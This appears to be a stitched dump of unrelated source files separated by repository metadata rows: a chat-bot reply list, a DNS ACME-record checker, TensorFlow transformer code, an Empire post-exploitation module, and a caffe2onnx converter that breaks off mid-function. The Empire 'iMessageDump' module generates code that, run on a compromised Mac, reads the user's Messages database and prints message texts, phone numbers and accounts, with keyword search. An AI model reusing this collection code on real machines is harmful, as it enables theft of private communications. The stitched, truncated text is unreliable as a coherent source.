MODERATION_CHANNELS = Channels.admins, Channels.admin_spam, Channels.mod_alerts, Channels.mods, Channels.mod_spam
# Bot replies
NEGATIVE_REPLIES = [
"Noooooo!!",
"Nope.",
"I'm sorry Dave, I'm afraid I can't do that.",
"I don't think so.",
"Not gonna happen.",
"Out of the question.",
"Huh? No.",
"Nah.",
"Naw.",
"Not likely.",
"No way, José.",
"Not in a million years.",
"Fat chance.",
"Certainly not.",
"NEGATORY.",
"Nuh-uh.",
"Not in my house!",
]
POSITIVE_REPLIES = [
"Yep.",
"Absolutely!",
"Can do!",
"Affirmative!",
"Yeah okay.",
"Sure.",
"Sure thing!",
"You're the boss!",
"Okay.",
"No problem.",
"I got you.",
"Alright.",
"You got it!",
"ROGER THAT",
"Of course!",
"Aye aye, cap'n!",
"I'll allow it.",
]
ERROR_REPLIES = [
"Please don't do that.",
"You have to stop.",
"Do you mind?",
"In the future, don't do that.",
"That was a mistake.",
"You blew it.",
"You're bad at computers.",
"Are you trying to kill me?",
"Noooooo!!",
"I can't believe you've done this",
]
| 22.478964
| 114
| 0.657429
|
e0061703b112d00472fb09a4e28a3d4ad9804f01
| 998
|
py
|
Python
|
dns_check.py
|
Nexterum/cert-bot-dns
|
fa69b4effe479ab82af8445ed79cb00562a7a9e4
|
[
"MIT"
] | null | null | null |
dns_check.py
|
Nexterum/cert-bot-dns
|
fa69b4effe479ab82af8445ed79cb00562a7a9e4
|
[
"MIT"
] | null | null | null |
dns_check.py
|
Nexterum/cert-bot-dns
|
fa69b4effe479ab82af8445ed79cb00562a7a9e4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import dns.resolver
from time import sleep
def wait_dns_update(d_name: str, text: str, sub: str = "_acme-challenge", interval: int = 60):
sleep(interval)
    # Poll up to 100 times, pausing between attempts, until the TXT record has propagated
    for _ in range(100):
        if check_record(d_name, text, sub):
            sleep(interval)
            exit(0)
        else:
            sleep(interval)
    # The record never appeared within the allotted attempts; signal failure
    exit(1)
def check_record(d_name: str, text: str, sub: str = "_acme-challenge"):
try:
answers = dns.resolver.query(sub + '.' + d_name, 'TXT')
print(' query qname:', answers.qname, ' num ans.', len(answers))
        for rdata in answers:
            for txt_string in rdata.strings:
                # Return True as soon as any TXT string matches the expected value
                if txt_string.decode("utf-8") == text:
                    return True
        # No matching TXT string was found in any answer
        return False
except dns.resolver.NXDOMAIN:
print("Couldn't find any records (NXDOMAIN)")
return False
except dns.resolver.NoAnswer:
print("Couldn't find any records (NoAnswer)")
return False
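# Illustrative usage (the domain and token below are placeholders, not from this script):
#   check_record("example.com", "<acme-token>") queries the TXT record at
#   _acme-challenge.example.com and returns True only if one of its strings matches,
#   while wait_dns_update("example.com", "<acme-token>", interval=30) polls until the
#   record propagates and then exits with status 0.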
| 30.242424
| 94
| 0.576152
|
64677cd5a6d2b800f3db67fbb8e28f96e90f883a
| 14,164
|
py
|
Python
|
modules.py
|
liqichen6688/duo-transformer
|
c718d59100c24b8f7f0a04ed01d563a882f4277d
|
[
"Apache-2.0"
] | null | null | null |
modules.py
|
liqichen6688/duo-transformer
|
c718d59100c24b8f7f0a04ed01d563a882f4277d
|
[
"Apache-2.0"
] | 5
|
2020-01-28T23:13:35.000Z
|
2022-02-10T00:46:40.000Z
|
modules.py
|
liqichen6688/duo-transformer
|
c718d59100c24b8f7f0a04ed01d563a882f4277d
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#!/usr/bin/python3
'''
Feb. 2019 by kyubyong park.
kbpark.linguist@gmail.com.
https://www.github.com/kyubyong/transformer.
Building blocks for Transformer
'''
import numpy as np
import tensorflow as tf
def ln(inputs, epsilon = 1e-8, scope="ln"):
'''Applies layer normalization. See https://arxiv.org/abs/1607.06450.
inputs: A tensor with 2 or more dimensions, where the first dimension has `batch_size`.
epsilon: A floating number. A very small number for preventing ZeroDivision Error.
scope: Optional scope for `variable_scope`.
Returns:
A tensor with the same shape and data dtype as `inputs`.
'''
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
inputs_shape = inputs.get_shape()
params_shape = inputs_shape[-1:]
mean, variance = tf.nn.moments(inputs, [-1], keep_dims=True)
beta= tf.get_variable("beta", params_shape, initializer=tf.zeros_initializer())
gamma = tf.get_variable("gamma", params_shape, initializer=tf.ones_initializer())
normalized = (inputs - mean) / ( (variance + epsilon) ** (.5) )
outputs = gamma * normalized + beta
return outputs
def get_token_embeddings(vocab_size, num_units, scope=0, zero_pad=True):
'''Constructs token embedding matrix.
    Note that the row with index 0 is set to zeros.
vocab_size: scalar. V.
    num_units: embedding dimensionality. E.
zero_pad: Boolean. If True, all the values of the first row (id = 0) should be constant zero
To apply query/key masks easily, zero pad is turned on.
Returns
weight variable: (V, E)
'''
with tf.variable_scope("shared_weight_matrix"+str(scope)):
embeddings = tf.get_variable('weight_mat',
dtype=tf.float32,
shape=(vocab_size, num_units),
initializer=tf.contrib.layers.xavier_initializer())
if zero_pad:
embeddings = tf.concat((tf.zeros(shape=[1, num_units]),
embeddings[1:, :]), 0)
return embeddings
def scaled_dot_product_attention(Q, K, V, key_masks,
causality=False, dropout_rate=0.,
training=True,
scope="scaled_dot_product_attention", memory=False):
'''See 3.2.1.
Q: Packed queries. 3d tensor. [N, T_q, d_k].
K: Packed keys. 3d tensor. [N, T_k, d_k].
V: Packed values. 3d tensor. [N, T_k, d_v].
key_masks: A 2d tensor with shape of [N, key_seqlen]
causality: If True, applies masking for future blinding
    dropout_rate: A floating point number in [0, 1].
    training: Boolean for controlling dropout.
scope: Optional scope for `variable_scope`.
'''
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
d_k = Q.get_shape().as_list()[-1]
d_v = V.get_shape().as_list()[-1]
# dot product
#outputs = tf.matmul(Q, tf.transpose(K, [0, 2, 1])) # (N, T_q, T_k)
K = mask(K, key_masks=key_masks, type="key", zero=True)
V = mask(V, key_masks=key_masks, type="key", zero=True)
if not memory:
Q = mask(Q, key_masks=key_masks, type="key", zero=True)
# scale
#outputs /= d_k ** 0.5
# key masking
#outputs = mask(outputs, key_masks=key_masks, type="key")
# causality or future blinding masking
if causality:
outputs = tf.matmul(Q, tf.transpose(K, [0, 2, 1]) / d_k ** 0.5) # (N, T_q, T_k)
outputs = mask(outputs, type="future")
outputs = tf.nn.softmax(outputs)
outputs = tf.matmul(outputs, V) # (N, T_q, d_v)
else:
#length = tf.reduce_sum(1 - tf.to_float(key_masks), axis=-1, keepdims=True)
#length = tf.expand_dims(length, 2)
#length = tf.tile(length, [1, d_k, d_v])
duo = tf.matmul(tf.transpose(K, [0, 2, 1]), V)
outputs = tf.nn.relu(tf.matmul(Q, duo))
# softmax
#outputs = tf.nn.softmax(outputs)
#attention = tf.transpose(outputs, [0, 2, 1])
#tf.summary.image("attention", tf.expand_dims(attention[:1], -1))
# # query masking
# outputs = mask(outputs, Q, K, type="query")
# dropout
outputs = tf.layers.dropout(outputs, rate=dropout_rate, training=training)
# weighted sum (context vectors)
#outputs = tf.matmul(outputs, V) # (N, T_q, d_v)
return outputs
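# Shape sketch for the non-causal ("duo") branch above, assuming h*N batch rows:
# duo = K^T V has shape (h*N, d_k, d_v), so relu(Q @ duo) yields outputs of shape
# (h*N, T_q, d_v) without ever forming the (T_q, T_k) attention matrix.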
def future_mask(Q, K, V):
duo = 0
outputs = []
for i in range(100):
duo += tf.matmul(tf.transpose(K[:, i:i+1, :], [0, 2, 1]),V[:, i:i+1, :])
outputs.append(tf.matmul(Q[:, i:i+1, :], duo/(i+1)))
outputs = tf.concat(outputs, axis=-2)
return outputs
#print(Q.get_shape().as_list())
#d_q = Q.get_shape().as_list()[-2]
#for i in range(100):
# outputs.append(ln(tf.matmul(tf.matmul(Q[:, i:i+1, :], tf.transpose(K[:, :i+1, :], [0, 2, 1])), V[:, :i+1, :]),scope='in'))
#outputs = tf.concat(outputs, axis=-2)
#return outputs
def mask(inputs, key_masks=None, type=None, zero=False):
"""Masks paddings on keys or queries to inputs
inputs: 3d tensor. (h*N, T_q, T_k)
key_masks: 3d tensor. (N, 1, T_k)
type: string. "key" | "future"
e.g.,
>> inputs = tf.zeros([2, 2, 3], dtype=tf.float32)
>> key_masks = tf.constant([[0., 0., 1.],
[0., 1., 1.]])
>> mask(inputs, key_masks=key_masks, type="key")
array([[[ 0.0000000e+00, 0.0000000e+00, -4.2949673e+09],
[ 0.0000000e+00, 0.0000000e+00, -4.2949673e+09]],
[[ 0.0000000e+00, -4.2949673e+09, -4.2949673e+09],
[ 0.0000000e+00, -4.2949673e+09, -4.2949673e+09]],
[[ 0.0000000e+00, 0.0000000e+00, -4.2949673e+09],
[ 0.0000000e+00, 0.0000000e+00, -4.2949673e+09]],
[[ 0.0000000e+00, -4.2949673e+09, -4.2949673e+09],
[ 0.0000000e+00, -4.2949673e+09, -4.2949673e+09]]], dtype=float32)
"""
padding_num = -2 ** 32 + 1
if type in ("k", "key", "keys"):
key_masks = tf.to_float(key_masks)
key_masks = tf.tile(key_masks, [tf.shape(inputs)[0] // tf.shape(key_masks)[0], 1]) # (h*N, seqlen)
#key_masks = tf.expand_dims(key_masks, 1) # (h*N, 1, seqlen)
key_masks = tf.tile(tf.expand_dims(key_masks, 2),[1, 1, tf.shape(inputs)[-1]])
if zero:
outputs = inputs * (1. - key_masks)
else:
outputs = inputs + key_masks * padding_num
# elif type in ("q", "query", "queries"):
# # Generate masks
# masks = tf.sign(tf.reduce_sum(tf.abs(queries), axis=-1)) # (N, T_q)
# masks = tf.expand_dims(masks, -1) # (N, T_q, 1)
# masks = tf.tile(masks, [1, 1, tf.shape(keys)[1]]) # (N, T_q, T_k)
#
# # Apply masks to inputs
# outputs = inputs*masks
elif type in ("f", "future", "right"):
diag_vals = tf.ones_like(inputs[0, :, :]) # (T_q, T_k)
tril = tf.linalg.LinearOperatorLowerTriangular(diag_vals).to_dense() # (T_q, T_k)
future_masks = tf.tile(tf.expand_dims(tril, 0), [tf.shape(inputs)[0], 1, 1]) # (N, T_q, T_k)
paddings = tf.ones_like(future_masks) * padding_num
outputs = tf.where(tf.equal(future_masks, 0), paddings, inputs)
else:
print("Check if you entered type correctly!")
return outputs
def multihead_attention(queries, keys, values, key_masks,
num_heads=8,
dropout_rate=0,
training=True,
causality=False,
scope="multihead_attention",
memory=False):
'''Applies multihead attention. See 3.2.2
queries: A 3d tensor with shape of [N, T_q, d_model].
keys: A 3d tensor with shape of [N, T_k, d_model].
values: A 3d tensor with shape of [N, T_k, d_model].
key_masks: A 2d tensor with shape of [N, key_seqlen]
num_heads: An int. Number of heads.
dropout_rate: A floating point number.
training: Boolean. Controller of mechanism for dropout.
causality: Boolean. If true, units that reference the future are masked.
scope: Optional scope for `variable_scope`.
Returns
A 3d tensor with shape of (N, T_q, C)
'''
d_model = queries[0].get_shape().as_list()[-1]
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
# Linear projections1
Q1 = tf.layers.dense(queries[0], d_model, use_bias=True) # (N, T_q, d_model)
K = tf.layers.dense(keys, d_model, use_bias=True) # (N, T_k, d_model)
V = tf.layers.dense(values, d_model, use_bias=True) # (N, T_k, d_model)
Q2 = tf.layers.dense(queries[1], d_model, use_bias=True) # (N, T_k, d_model)
# Split and concat1
Q1_ = tf.concat(tf.split(Q1, num_heads, axis=2), axis=0) # (h*N, T_q, d_model/h)
K_ = tf.concat(tf.split(K, num_heads, axis=2), axis=0) # (h*N, T_k, d_model/h)
V_ = tf.concat(tf.split(V, num_heads, axis=2), axis=0) # (h*N, T_k, d_model/h)
Q2_ = tf.concat(tf.split(Q2, num_heads, axis=2), axis=0) # (h*N, T_q, d_model/h)
## Linear projections2
#Q2 = tf.layers.dense(queries[1], d_model, use_bias=True) # (N, T_q, d_model)
#K2 = tf.layers.dense(keys[1], d_model, use_bias=True) # (N, T_k, d_model)
#V2 = tf.layers.dense(values[1], d_model, use_bias=True) # (N, T_k, d_model)
#
## Split and concat2
#Q2_ = tf.concat(tf.split(Q2, num_heads, axis=2), axis=0) # (h*N, T_q, d_model/h)
#K2_ = tf.concat(tf.split(K2, num_heads, axis=2), axis=0) # (h*N, T_k, d_model/h)
#V2_ = tf.concat(tf.split(V2, num_heads, axis=2), axis=0) # (h*N, T_k, d_model/h)
# Attention
outputs1 = scaled_dot_product_attention(Q1_, K_, V_, key_masks, causality, dropout_rate, training, memory=memory)
outputs2 = scaled_dot_product_attention(Q2_, V_, K_, key_masks, causality, dropout_rate, training, memory=memory)
# Restore shape
outputs1 = tf.concat(tf.split(outputs1, num_heads, axis=0), axis=2 ) # (N, T_q, d_model)
outputs2 = tf.concat(tf.split(outputs2, num_heads, axis=0), axis=2) # (N, T_q, d_model)
# Residual connection
outputs1 += queries[0]
outputs2 += queries[1]
# Normalize
outputs1 = ln(outputs1)
outputs2 = ln(outputs2)
return outputs1, outputs2
def ff(inputs, num_units, scope="positionwise_feedforward"):
'''position-wise feed forward net. See 3.3
inputs: A 3d tensor with shape of [N, T, C].
num_units: A list of two integers.
scope: Optional scope for `variable_scope`.
Returns:
A 3d tensor with the same shape and dtype as inputs
'''
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
# Inner layer
outputs = tf.layers.dense(inputs, num_units[0], activation=tf.nn.relu)
# Outer layer
outputs = tf.layers.dense(outputs, num_units[1])
# Residual connection
outputs += inputs
# Normalize
outputs = ln(outputs)
return outputs
def label_smoothing(inputs, epsilon=0.1):
'''Applies label smoothing. See 5.4 and https://arxiv.org/abs/1512.00567.
inputs: 3d tensor. [N, T, V], where V is the number of vocabulary.
epsilon: Smoothing rate.
For example,
```
import tensorflow as tf
inputs = tf.convert_to_tensor([[[0, 0, 1],
[0, 1, 0],
[1, 0, 0]],
[[1, 0, 0],
[1, 0, 0],
[0, 1, 0]]], tf.float32)
outputs = label_smoothing(inputs)
with tf.Session() as sess:
print(sess.run([outputs]))
>>
[array([[[ 0.03333334, 0.03333334, 0.93333334],
[ 0.03333334, 0.93333334, 0.03333334],
[ 0.93333334, 0.03333334, 0.03333334]],
[[ 0.93333334, 0.03333334, 0.03333334],
[ 0.93333334, 0.03333334, 0.03333334],
[ 0.03333334, 0.93333334, 0.03333334]]], dtype=float32)]
```
'''
V = inputs.get_shape().as_list()[-1] # number of channels
return ((1-epsilon) * inputs) + (epsilon / V)
def positional_encoding(inputs,
maxlen,
masking=True,
scope="positional_encoding"):
'''Sinusoidal Positional_Encoding. See 3.5
inputs: 3d tensor. (N, T, E)
maxlen: scalar. Must be >= T
masking: Boolean. If True, padding positions are set to zeros.
scope: Optional scope for `variable_scope`.
returns
3d tensor that has the same shape as inputs.
'''
E = inputs.get_shape().as_list()[-1] # static
N, T = tf.shape(inputs)[0], tf.shape(inputs)[1] # dynamic
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
# position indices
position_ind = tf.tile(tf.expand_dims(tf.range(T), 0), [N, 1]) # (N, T)
# First part of the PE function: sin and cos argument
position_enc = np.array([
[pos / np.power(10000, (i-i%2)/E) for i in range(E)]
for pos in range(maxlen)])
        # Second part: apply sin to the even columns and cos to the odd columns.
position_enc[:, 0::2] = np.sin(position_enc[:, 0::2]) # dim 2i
position_enc[:, 1::2] = np.cos(position_enc[:, 1::2]) # dim 2i+1
position_enc = tf.convert_to_tensor(position_enc, tf.float32) # (maxlen, E)
# lookup
outputs = tf.nn.embedding_lookup(position_enc, position_ind)
# masks
if masking:
outputs = tf.where(tf.equal(inputs, 0), inputs, outputs)
return tf.to_float(outputs)
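# Worked example (illustrative): for E=4 and pos=1 the construction above yields
# [sin(1/10000^0), cos(1/10000^0), sin(1/10000^0.5), cos(1/10000^0.5)]
# = [sin(1), cos(1), sin(0.01), cos(0.01)], i.e. sin on even dims, cos on odd dims.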
def noam_scheme(init_lr, global_step, warmup_steps=4000.):
'''Noam scheme learning rate decay
init_lr: initial learning rate. scalar.
global_step: scalar.
warmup_steps: scalar. During warmup_steps, learning rate increases
until it reaches init_lr.
'''
step = tf.cast(global_step + 1, dtype=tf.float32)
return init_lr * warmup_steps ** 0.5 * tf.minimum(step * warmup_steps ** -1.5, step ** -0.5)
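# Illustrative usage sketch (optimizer wiring is assumed, not part of this module):
#   global_step = tf.train.get_or_create_global_step()
#   lr = noam_scheme(init_lr=0.0003, global_step=global_step, warmup_steps=4000.)
#   train_op = tf.train.AdamOptimizer(lr).minimize(loss, global_step=global_step)
# The rate rises linearly for `warmup_steps` steps, then decays as step ** -0.5.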
| 39.344444
| 131
| 0.587616
|
a2fbb6db6ecd4a3c6c550e7f6a9e61792b2b6a16
| 13,383
|
py
|
Python
|
lib/modules/python/collection/osx/imessage_dump.py
|
terrorizer1980/Empire
|
9259e5106986847d2bb770c4289c0c0f1adf2344
|
[
"BSD-3-Clause"
] | 49
|
2015-09-02T15:20:09.000Z
|
2022-03-05T18:18:23.000Z
|
lib/modules/python/collection/osx/imessage_dump.py
|
rmusser01/Empire
|
c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556
|
[
"BSD-3-Clause"
] | 1
|
2020-11-04T08:15:12.000Z
|
2020-11-04T08:15:12.000Z
|
lib/modules/python/collection/osx/imessage_dump.py
|
InfinitelyFreedom/Empire
|
3a922f60d92658fb716efb3be5a1c15074114766
|
[
"BSD-3-Clause"
] | 24
|
2015-09-08T11:45:23.000Z
|
2022-02-07T23:53:58.000Z
|
#!/usr/bin/env python3
from builtins import object
from builtins import str
class Module(object):
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'iMessageDump',
# list of one or more authors for the module
'Author': ['Alex Rymdeko-Harvey', '@Killswitch-GUI'],
# more verbose multi-line description of the module
'Description': 'This module will enumerate the entire chat and IMessage SQL Database.',
'Software': '',
'Techniques': ['T1081'],
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# Use on disk execution method, rather than a dynamic exec method
'RunOnDisk' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
                'The iMessage SQLite3 database correlates users to messages in a consistent schema and is not encrypted.'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to run from.',
'Required' : True,
'Value' : ''
},
'Messages' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The number of messages to enumerate from most recent.',
'Required' : True,
'Value' : '10'
},
'Search' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Enable a find keyword to search for within the iMessage Database.',
'Required' : False,
'Value' : ''
},
'Debug' : {
# The 'Agent' option is the only one that MUST be in a module
                'Description'   :   'Print verbose debug output while enumerating the iMessage database.',
'Required' : True,
'Value' : 'False'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
count = self.options['Messages']['Value']
script = "count = " + str(count) + '\n'
if self.options['Debug']['Value']:
debug = self.options['Debug']['Value']
script += "debug = " + str(debug) + '\n'
if self.options['Search']['Value']:
search = self.options['Search']['Value']
script += 'searchPhrase = "' + str(search) + '"\n'
script += """
try:
if searchPhrase:
searchMessage = True
except:
searchMessage = False
searchPhrase = ""
try:
class imessage_dump():
def __init__(self):
try:
print("[*] Message Enumeration Started!")
except Exception as e:
print(e)
def func(self, count, searchMessage, debug, searchPhrase):
try:
import sqlite3
from os.path import expanduser
home = expanduser("~") + '/Library/Messages/chat.db'
# Open the database handle for the user
conn = sqlite3.connect(home)
cur = conn.cursor()
# Query Date, Text message and place it into a array
cur.execute("SELECT date,text,service,account,ROWID FROM message;")
# execute the data enum
statment = cur.fetchall()
# handle: Table links the number, country, type to the chat ID
# SELECT * FROM handle
# ex: (2, u'+12150000000', u'US', u'iMessage', None)
cur.execute("SELECT ROWID,id,country,service FROM handle")
handle = cur.fetchall()
                # chat_message_join: Links the chat ID to the Text ID (sequence number)
# SELECT * FROM chat_message_join
cur.execute("SELECT chat_id,message_id FROM chat_message_join")
messageLink = cur.fetchall()
#cur.execute("SELECT account_id,service_center,chat_identifier FROM chat")
#GuidData = cur.fetchall()
                # Iterate over data
dictList = []
count = count * -1
for item in statment[count:]:
try:
for messageid in messageLink:
                            # simple declaration to prevent empty values
if str(messageid[1]) == str(item[4]):
chatid = messageid[0]
for rowid in handle:
if str(rowid[0]) == str(chatid):
if rowid[1]:
Number = str(rowid[1])
if rowid[2]:
Country = str(rowid[2])
if rowid[3]:
Type = str(rowid[3])
epoch = self.TimeConv(item[0], debug)
line = {}
try:
if item[4]:
line['ROWID'] = str(item[4])
if item[2]:
line['Service'] = str(item[2])
if item[3]:
line['Account'] = str(item[3])
if epoch:
line['Date'] = str(epoch)
if Number:
line['Number'] = str(Number)
if Country:
line['Country'] = str(Country)
if Type:
line['Type'] = str(Type)
if item[1]:
line['Message'] = str(self.RemoveUnicode(item[1]))
except Exception as e:
if debug:
print(" [Debug] Issues with object creation (line 55): " + str(e))
dictList.append(line)
except Exception as e:
if debug:
print(" [Debug] Isssue at object creation (line 40): " + str(e))
pass
print(e)
conn.close()
x = 0
for dic in dictList:
try:
if searchMessage:
# check for phrase in message
try:
if dic['Message']:
Msg = dic['Message'].lower()
if Msg.find(searchPhrase.lower()) != -1:
for key in list(dic.keys()):
print(" %s : %s" %(key, dic[key]))
x += 1
print('')
except Exception as e:
if debug:
print(" [Debug] At Decode of Dict item for Message search (line 180): " + str(e))
pass
else:
for key in list(dic.keys()):
try:
print(" %s : %s" %(key, dic[key]))
except Exception as e:
if debug:
print(" [Debug] At Decode of Dict item (line 180): " + str(e))
pass
print('')
except Exception as e:
print("[!] Issue Decoding Dict Item: " + str(e))
if searchMessage:
print("[!] Messages Matching Phrase: " + str(x))
print("[!] Messages in DataStore: " + str(len(statment)))
count = count * -1
print("[!] Messages Enumerated: " + str(count))
except Exception as e:
print(e)
# Close the Database handle
def TimeConv(self, epoch, debug):
import datetime
try:
d = datetime.datetime.strptime("01-01-2001", "%m-%d-%Y")
time = (d + datetime.timedelta(seconds=epoch)).strftime("%a, %d %b %Y %H:%M:%S GMT")
return time
except Exception as e:
if debug:
print(" [Debug] Issues Decoding epoch time: " + str(e))
def RemoveUnicode(self, string):
import re
try:
string_data = string
if string_data is None:
return string_data
if isinstance(string_data, str):
string_data = str(string_data.decode('ascii', 'ignore'))
else:
string_data = string_data.encode('ascii', 'ignore')
remove_ctrl_chars_regex = re.compile(r'[^\x20-\x7e]')
CleanString = remove_ctrl_chars_regex.sub('', string_data)
return CleanString
except Exception as e:
p = '[!] UTF8 Decoding issues Matching: ' + str(e)
print(p)
im = imessage_dump()
im.func(count, searchMessage, debug, searchPhrase)
except Exception as e:
print(e)"""
# add any arguments to the end exec
return script
# handle: Table links the number, country, type to the chat ID
# SELECT * FROM handle
# chat_message_join: Links the chat ID to the Text ID (sequence number)
# SELECT * FROM chat_message_join
# INTEGER: A signed integer up to 8 bytes depending on the magnitude of the value.
# REAL: An 8-byte floating point value.
# TEXT: A text string, typically UTF-8 encoded (depending on the database encoding).
# BLOB: A blob of data (binary large object) for storing binary data.
# NULL: A NULL value, represents missing data or an empty cell.
# SQLITE3 message layout:
# (u'table', u'message', u'message', 5, u'CREATE TABLE message (ROWID INTEGER PRIMARY KEY AUTOINCREMENT,
# guid TEXT UNIQUE NOT NULL, text TEXT, replace INTEGER DEFAULT 0, service_center TEXT, handle_id INTEGER DEFAULT 0,
# subject TEXT, country TEXT, attributedBody BLOB, version INTEGER DEFAULT 0, type INTEGER DEFAULT 0, service TEXT,
# account TEXT, account_guid TEXT, error INTEGER DEFAULT 0, date INTEGER, date_read INTEGER, date_delivered INTEGER,
# is_delivered INTEGER DEFAULT 0, is_finished INTEGER DEFAULT 0, is_emote INTEGER DEFAULT 0, is_from_me INTEGER DEFAULT 0,
# is_empty INTEGER DEFAULT 0, is_delayed INTEGER DEFAULT 0, is_auto_reply INTEGER DEFAULT 0, is_prepared INTEGER DEFAULT 0,
# is_read INTEGER DEFAULT 0, is_system_message INTEGER DEFAULT 0, is_sent INTEGER DEFAULT 0, has_dd_results INTEGER DEFAULT 0,
# is_service_message INTEGER DEFAULT 0, is_forward INTEGER DEFAULT 0, was_downgraded INTEGER DEFAULT 0, is_archive INTEGER DEFAULT 0,
# cache_has_attachments INTEGER DEFAULT 0, cache_roomnames TEXT, was_data_detected INTEGER DEFAULT 0, was_deduplicated INTEGER DEFAULT 0,
# is_audio_message INTEGER DEFAULT 0, is_played INTEGER DEFAULT 0, date_played INTEGER, item_type INTEGER DEFAULT 0,
# other_handle INTEGER DEFAULT 0, group_title TEXT, group_action_type INTEGER DEFAULT 0, share_status INTEGER DEFAULT 0,
# share_direction INTEGER DEFAULT 0, is_expirable INTEGER DEFAULT 0, expire_state INTEGER DEFAULT 0, message_action_type INTEGER DEFAULT 0,
# message_source INTEGER DEFAULT 0)')
| 46.46875
| 139
| 0.496824
|
de8e378e9f6b59dcf521f5669f093920895a448f
| 28,696
|
py
|
Python
|
caffe2onnx/src/caffe2onnx.py
|
kumardesappan/caffe2onnx
|
b7e73feed3bbc5ddbdf25b87af93a2bae596055d
|
[
"BSD-3-Clause"
] | null | null | null |
caffe2onnx/src/caffe2onnx.py
|
kumardesappan/caffe2onnx
|
b7e73feed3bbc5ddbdf25b87af93a2bae596055d
|
[
"BSD-3-Clause"
] | null | null | null |
caffe2onnx/src/caffe2onnx.py
|
kumardesappan/caffe2onnx
|
b7e73feed3bbc5ddbdf25b87af93a2bae596055d
|
[
"BSD-3-Clause"
] | 1
|
2022-01-20T05:18:29.000Z
|
2022-01-20T05:18:29.000Z
|
import copy
import numpy as np
from onnx import helper
import onnx
from . import OPs as op
from .c2oObject import *
from .op_layer_info import *
class Caffe2Onnx():
def __init__(self,net,model,onnxname):
# Initialize a c2oGraph object
self.onnxmodel = c2oGraph(onnxname)
# Network and parameters
self._NetLayer = self.__getNetLayer(net)
self._ModelLayer = self.__getModelLayer(model)
# Model input name and input dimension
self.model_input_name = []
self.model_input_shape = []
# Node list
self.__n = 0
self.NodeList = []
# Get layer list
LayerList = self.__addInputsTVIandGetLayerList(net)
self.__getNodeList(LayerList)
self.__addOutputsTVIandValueInfo()
# Get the network layer
def __getNetLayer(self,net):
if len(net.layer)==0 and len(net.layers)!=0:
return net.layers
elif len(net.layer)!=0 and len(net.layers)==0:
return net.layer
else:
print("prototxt layer error")
return -1
# Get parameter layer
def __getModelLayer(self,model):
if len(model.layer) == 0 and len(model.layers) != 0:
return model.layers
elif len(model.layer) != 0 and len(model.layers) == 0:
return model.layer
else:
print("caffemodel layer error")
return -1
# Add model input information to Inputs and get a list of subsequent layers
def __addInputsTVIandGetLayerList(self,net):
# If the type of the first layer is Input, and no net.input exists
if net.input == [] and self._NetLayer[0].type == "Input":
layer_list = []
            # The network may declare multiple Input layers, so collect them all
for lay in self._NetLayer:
if lay.type == "Input":
in_tvi = helper.make_tensor_value_info(lay.name+"_input", TensorProto.FLOAT, lay.input_param.shape[0].dim)
self.model_input_name.append(lay.name+"_input")
self.model_input_shape.append(lay.input_param.shape[0].dim)
self.onnxmodel.addInputsTVI(in_tvi)
print("add model input information")
else:
layer_list.append(lay)
return layer_list
# If net.input exists
elif net.input !=[]:
if bool(net.input_dim):
input_dim = net.input_dim
elif bool(net.input_shape):
input_dim = net.input_shape[0].dim
else:
raise RuntimeError("Input shape missing!")
in_tvi = helper.make_tensor_value_info("input", TensorProto.FLOAT, input_dim)
self.model_input_name.append("input")
self.model_input_shape.append(input_dim)
self.onnxmodel.addInputsTVI(in_tvi)
print("add model input information")
return self._NetLayer
        # Otherwise the caffe model declares no input, which is an error
else:
raise ValueError("the caffe model has no input")
# Get the parameter shape of layer
def __getParamsShapeandData(self, layer):
ParamShape = []
ParamData = []
# According to the layer name, find out the parameters in the corresponding caffemodel
for model_layer in self._ModelLayer:
if layer.name == model_layer.name:
Params = copy.deepcopy(model_layer.blobs)
ParamShape = [p.shape.dim for p in Params]
ParamData = [p.data for p in Params]
if layer.type == "BatchNorm" or layer.type == "BN":
if len(ParamShape) == 3:
# If it is a bn layer, the sliding coefficient of the last layer is not used
ParamShape = ParamShape[:-1]
ParamData = ParamData[:-1]
elif len(ParamShape) == 2 and len(ParamShape[0]) != 1:
ParamShape = [[ParamShape[0][1]], [ParamShape[1][1]]]
ParamData = ParamData
return ParamShape, ParamData
# Add parameters to Inputs and generate tensor storage data
def __addInputsTVIfromParams(self,layer,ParamName,ParamType):
#print(layer.type)
ParamShape = []
ParamData = []
# Find out the parameters in the corresponding caffemodel based on the layer name
for model_layer in self._ModelLayer:
if layer.name == model_layer.name:
Params = copy.deepcopy(model_layer.blobs)
ParamShape = [p.shape.dim for p in Params]
ParamData = [p.data for p in Params]
if layer.type == "BatchNorm" or layer.type == "BN":
if len(ParamShape) == 3:
# If it is bn layer and params is [mean, var, s], you need to divide mean and var by sliding coefficient s
ParamShape = ParamShape[:-1]
ParamData = [[q/(Params[-1].data[0]) for q in p.data] if i==0 else [q/(Params[-1].data[0] + 1e-5) for q in p.data] for i,p in enumerate(Params[:-1])] # with s
elif len(ParamShape) == 2 and len(ParamShape[0]) == 4:
ParamShape = [[ParamShape[0][1]], [ParamShape[1][1]]]
